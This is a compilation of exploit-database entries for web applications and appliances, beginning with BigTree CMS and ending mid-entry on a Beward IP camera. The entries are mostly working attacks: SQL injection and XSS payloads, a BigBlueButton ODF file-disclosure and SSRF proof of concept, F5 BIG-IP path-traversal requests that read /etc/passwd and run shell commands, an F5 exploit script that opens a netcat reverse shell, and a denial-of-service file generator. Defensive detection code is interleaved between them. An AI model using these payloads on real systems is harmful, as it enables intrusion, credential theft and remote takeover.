# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527 (a double URL-encoded single quote)
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================
source: https://www.securityfocus.com/bid/56744/info
BigDump is prone to a cross-site scripting vulnerability, an SQL-injection vulnerability, and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, upload arbitrary files, access or modify data, or exploit latent vulnerabilities in the underlying database.
BigDump 0.29b and 0.32b are vulnerable; other versions may also be affected.
http://www.example.com/bigdump.php?start= [SQL]
http://www.example.com/bigdump.php?start= [XSS]
http://www.example.com/bigdump.php [File Upload]
# Exploit Title: Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ocsolutions.co.in/
# Software Link: https://codecanyon.net/item/marketplace-builder-a-complete-ecommerce-multivendor-solution-with-cms/21808220
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?route=product/category&path=[SQL]
# The path value in the request below is URL-encoded; decoded it reads:
# 33_641499999' /*!13337ProceDure*/ AnAlyse (extractvalue(0,concat(0x27,0x3a,@@version)),0)-- -
# (error-based injection: the MySQL version is reflected in the XPath error message)
#
GET /[PATH]/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb; currency=USD
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 18:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.6.39
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
# Date: 2020-09-11
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://bigbluebutton.org/
# Version: BigBlueButton 2.2.25
RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.
Details
=======
Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820
Introduction
============
"BigBlueButton is a web conferencing system designed for online
learning."
(from the vendor's homepage)
More Details
============
BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].
The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.
LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.
Proof of Concept
================
Start from an empty ODF Text Document and extract the content:
$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive: empty.odt
extracting: mimetype
creating: Configurations2/accelerator/
creating: Configurations2/images/Bitmaps/
creating: Configurations2/toolpanel/
creating: Configurations2/progressbar/
creating: Configurations2/statusbar/
creating: Configurations2/toolbar/
creating: Configurations2/floater/
creating: Configurations2/popupmenu/
creating: Configurations2/menubar/
inflating: manifest.rdf
inflating: meta.xml
inflating: settings.xml
extracting: Thumbnails/thumbnail.png
inflating: styles.xml
inflating: content.xml
inflating: META-INF/manifest.xml
Replace the <office:body> element in the file content.xml with the
following:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="file:///etc/passwd"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
The text document now includes a section that references the external
file /etc/passwd. Create a new ODF Text Document with the modified
content:
$ zip -r ../modified.odt *
The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="http://example.com"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.
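The procedure above (unzip, edit the body, re-zip) done in Python as an added example, not code from the advisory or from BigBlueButton: build_odt() writes a minimal ODT whose only content is the section-source XLink, and external_links() is the check an upload pipeline can run before handing a file to LibreOffice; it walks every XML part in the package and reports any xlink:href with a URL scheme or an absolute or parent-relative path. The package skeleton (manifest and content.xml) is a constructed minimum rather than the contents of empty.odt.

```python
"""Added example: build an ODT carrying an external XLink section source,
and scan an ODT for such links. Not BigBlueButton or advisory code."""
import io
import urllib.parse
import zipfile
import xml.etree.ElementTree as ET

ODF_MIME = "application/vnd.oasis.opendocument.text"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Constructed minimal content.xml: the <office:body> from the advisory with
# the namespace declarations it needs to parse.
CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
    xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink" office:version="1.2">
 <office:body>
  <office:text>
   <text:section text:name="string">
    <text:section-source xlink:href="{href}" xlink:type="simple"
                         xlink:show="embed" xlink:actuate="onLoad"/>
   </text:section>
  </office:text>
 </office:body>
</office:document-content>
"""

MANIFEST_XML = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
 <manifest:file-entry manifest:full-path="/" manifest:media-type="application/vnd.oasis.opendocument.text"/>
 <manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>
</manifest:manifest>
"""


def build_odt(href):
    """Minimal ODT whose only content is a section sourced from <href>.
    'mimetype' is written first and uncompressed, as ODF requires; a plain
    'zip -r' does not guarantee either."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(zipfile.ZipInfo("mimetype"), ODF_MIME, compress_type=zipfile.ZIP_STORED)
        z.writestr("META-INF/manifest.xml", MANIFEST_XML, compress_type=zipfile.ZIP_DEFLATED)
        z.writestr("content.xml", CONTENT_XML.format(href=href), compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def mimetype_first(odt_bytes):
    """True if the package starts with the 'mimetype' entry."""
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        return z.namelist()[0] == "mimetype"


def external_links(odt_bytes):
    """Every xlink:href in the package's XML parts that points outside the
    package: any URL with a scheme (file:, http:, ...) or an absolute or
    parent-relative path. Returns a list of (part name, href)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".xml"):
                continue
            for el in ET.fromstring(z.read(name)).iter():
                href = el.get("{%s}href" % XLINK_NS)
                if href is None:
                    continue
                if urllib.parse.urlsplit(href).scheme or href.startswith("/") or href.startswith(".."):
                    hits.append((name, href))
    return hits


def safe_to_convert(odt_bytes):
    """Gate for an upload pipeline: refuse documents with external links."""
    return not external_links(odt_bytes)


if __name__ == "__main__":
    for target in ("file:///etc/passwd", "http://example.com", "Pictures/logo.png"):
        doc = build_odt(target)
        print(target, "->", external_links(doc), "safe:", safe_to_convert(doc))
```

The scanner parses every XML part, not just content.xml, because styles.xml and other parts may carry XLinks too. It is a pre-filter, not a substitute for the vendor fix: LibreOffice should additionally be run for conversion in a sandbox with no network and no access to the credential files named under Security Risk.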
Workaround
==========
To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.
Fix
===
Update to fixed version 2.2.27. Change the API key after the update, since it may have been read through this vulnerability.
Security Risk
=============
As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.
Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.
To exploit this vulnerability, attackers need access to a conference
with the ability to upload presentations. While successful exploitation
would have severe consequences for the affected BigBlueButton instance,
it is rated as only a medium risk because presenter access is required.
Timeline
========
2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
           Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
           mentioned similar bugreport
2020-09-25 Requested information whether "similar bugreport"
           uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar bugreport"
           uses the same vulnerability, whether release schedule is
           known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released
References
==========
[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH          Tel.: +49 241 510081-0
Dennewartstr. 25-27              Fax : +49 241 510081-99
52068 Aachen                     https://www.redteam-pentesting.de
Germany                          Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
source: https://www.securityfocus.com/bid/66350/info
BIGACE Web CMS is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.
BIGACE Web CMS 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI]
## RCE:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
## Read File:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
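An added detection example, not part of the advisory, that models the mismatch behind the two requests above: a front-end proxy that treats "..;" as an ordinary directory name, while the servlet container strips ";" path parameters from each segment and then collapses "..". The access-log lines and the public-prefix list are constructed assumptions, and the two-view model simplifies the real request pipeline.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in Common Log Format; not from the page or any real appliance.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2020:12:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2020:12:00:07 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 2048
10.0.0.9 - - [06/Jul/2020:12:00:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1337
10.0.0.7 - - [06/Jul/2020:12:00:11 +0000] "POST /tmui/login.jsp;jsessionid=0123ABCD HTTP/1.1" 302 0
10.0.0.7 - - [06/Jul/2020:12:00:13 +0000] "GET /tmui/Control/form HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Prefixes the front-end proxy is assumed to serve without authentication (modelled on the login page).
PUBLIC_PREFIXES = ("/tmui/login.jsp",)


def is_public(path):
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)


def servlet_view(path):
    """Resolve a raw path the way a Java servlet container does before mapping it:
    percent-decode, drop ';...' path parameters from every segment, then collapse '.' and '..'.
    A proxy that keeps ';' as ordinary data sees '..;' as a harmless directory name, so the
    two components can disagree about which resource a request addresses."""
    out = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def classify(target):
    """Return (raw_path, resolved_path) when the proxy would treat the request as public
    but the container resolves it to a non-public resource; otherwise None."""
    raw = urlsplit(target).path
    resolved = servlet_view(raw)
    if is_public(raw) and not is_public(resolved):
        return raw, resolved
    return None


def scan_log(text):
    """Return one finding per log line whose proxy view and container view disagree."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "raw": hit[0],
                             "resolved": hit[1], "status": int(m.group("status"))})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['raw']} -> {f['resolved']} (HTTP {f['status']})")
```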
#!/bin/bash
#
# EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip
#
# Exploit Title: F5 BIG-IP Remote Code Execution
# Date: 2020-07-06
# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
# Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-5902
#
# Requirements:
# Java JDK
# hsqldb.jar 1.8
# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
#
if [[ $# -ne 3 ]]
then
    echo
    echo "Usage: $(basename $0) <server> <localip> <localport>"
    echo
    exit 1
fi
server=${1?hostname argument required}
localip=${2?Localip argument required}
port=${3?Port argument required}
if [[ ! -f $server.der ]]
then
    echo "$server.der does not exist - extracting cert"
    openssl s_client \
        -showcerts \
        -servername $server \
        -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der
    keytool -import \
        -alias $server \
        -keystore keystore \
        -storepass changeit \
        -noprompt \
        -file $PWD/$server.der
else
    echo "$server.der already exists. skipping extraction step"
fi
java -jar ysoserial-master-SNAPSHOT.jar \
    CommonsCollections6 \
    "/bin/nc -e /bin/bash $localip $port" > nc.class
xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex
if [[ ! -f f5RCE.class ]]
then
    echo "Building exploit"
    javac -cp hsqldb.jar f5RCE.java
fi
java -cp hsqldb.jar:. \
    -Djavax.net.ssl.trustStore=keystore \
    -Djavax.net.ssl.trustStorePassword=changeit \
    f5RCE $server payload.hex
source: https://www.securityfocus.com/bid/52983/info
BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
BGS CMS 2.2.1 is vulnerable; other versions may also be affected.
<html>
<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
</script>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="description" value="Cross Site Scripting" />
<input type="hidden" name="parent_id" value="15" />
<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="categories" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="29" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="title" value="Zero Science Lab" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="disp_on_full_view" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="level" value="0" />
<input type="hidden" name="type" value="ads" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="ads" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="0" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="created" value="ZSL" />
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="email" value="test@test.mk" />
<input type="hidden" name="message" value="t00t" />
<input type="hidden" name="status" value="coolio" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="orders" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="question" value="What is physics?" />
<input type="hidden" name="start" value="10 2012" />
<input type="hidden" name="end" value="18 2012" />
<input type="hidden" name="answer_text[]" value="A warm summer evening." />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="polls" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="image" value="joxy.jpg" />
<input type="hidden" name="url" value='"><script>alert(1);</script>' />
<input type="hidden" name="max_displays" value="1" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="banners" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="9" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="description" value="Ban" />
<input type="hidden" name="folder" value="sexy_banner_imgx" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="gallery" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/" method="GET" id="xss6">
<input type="hidden" name="action" value="search" />
<input type="hidden" name="search" value='"><script>alert(1);</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
</form>
<form action="http://www.example.com/cms/" method="GET" id="xss7">
<input type="hidden" name="section" value='"><script>alert(1);</script>' />
<input type="hidden" name="action" value="add_news" />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href="javascript: xss6();" style="text-decoration:none">
<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />
<a href="javascript: xss7();" style="text-decoration:none">
<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />
</body></html>
## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based
## Description:
The bgERP system suffers from unsecured login cookies: the cookies store
very sensitive login information as well as the login session information!
An attacker can trick an already logged-in user, steal the already
generated cookie from the system, and do VERY DANGEROUS things with the
stored sensitive information.
This can be very expensive for all companies which are using this
system, so please be careful!
Also, this system has a search parameter that is vulnerable to reflected XSS attacks!
## STATUS: HIGH Vulnerability
[+] Exploit:
```HTTP
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```
[+] Response after logout of the system:
```HTTP
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
OK
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)
## Proof and Exploit:
[href](https://streamable.com/xhffdu)
## Time spent
`01:30:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"
# Date: 30/12/2021
# Exploit Author: Malcrove
# Vendor Homepage: https://www.beyondtrust.com/
# Version: v6.0 and earlier versions
Summary:
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allows remote attackers to inject arbitrary web script or HTML. Remote attackers could achieve full admin access to the appliance by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
Vulnerability Details:
Affected Endpoint: /appliance/login
Affected Parameter: login[password]
Request Method: GET or POST
Proof of concept (POC):
Navigating to the link below in a modern web browser fires the alert(document.domain) JavaScript call in the context of the BeyondTrust Remote Support domain.
http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
Mitigation:
A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.
- Time-Line:
April 6, 2021: Vulnerability advisory sent to the vendor (BeyondTrust)
April 8, 2021: Received an initial reply from the vendor
Jun 10, 2021: The vendor released a fix for the vulnerability in NSBase 6.1
Dec 30, 2021: Responsible public disclosure
- Credits
Ahmed Aboul-Ela (Malcrove)
# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovery Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
# Tested Version: 2.2.5.3
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the Python exploit script; it will create a new
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server 2.2.5.3, click "Configure", then click "Update Options", then
# click "Proxy Settings". Paste the content into the field "Proxy Password" and click "OK".
# It will cause the DoS condition.
bof = "A" * 2000
try:
    print("payload is loading..")
    dosya = open('mre.txt', 'w')
    dosya.write(bof)
    dosya.close()
    print(" [+] File Created")
except Exception:
    print("Something went wrong!")
BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
